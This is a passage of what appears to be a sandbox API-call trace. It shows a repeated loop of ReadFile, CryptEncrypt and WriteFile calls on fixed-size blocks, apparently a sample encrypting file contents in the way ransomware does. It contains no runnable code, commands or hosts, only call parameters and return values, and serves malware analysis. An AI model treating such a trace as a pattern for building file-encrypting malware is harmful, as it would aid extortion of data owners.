returned 1 [0281.911] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.911] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.912] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.912] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.912] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.912] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.912] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.912] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.912] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.912] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.912] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.912] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.912] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.912] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.912] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.912] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.912] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.913] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.913] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.913] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.913] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.913] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.913] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.913] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.913] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.913] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.913] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.913] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.913] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.913] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.913] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.913] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.914] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.914] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.914] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.914] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.914] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.914] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.914] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.914] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.914] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.914] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.914] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.915] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.915] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.915] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.915] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.915] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.915] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.915] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.915] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.915] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.915] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.915] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.915] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.915] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.916] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.916] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.916] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.916] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.916] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.916] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.916] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.916] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.916] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.916] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.916] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.916] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.916] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.916] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.916] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.917] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.917] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.917] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.917] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.917] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.917] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.917] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.917] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.917] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.917] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.917] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.917] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.917] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.917] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.918] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.918] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.918] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.918] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.918] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.918] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.918] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.918] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.918] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.918] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.918] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.918] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.918] ReadFile (in: 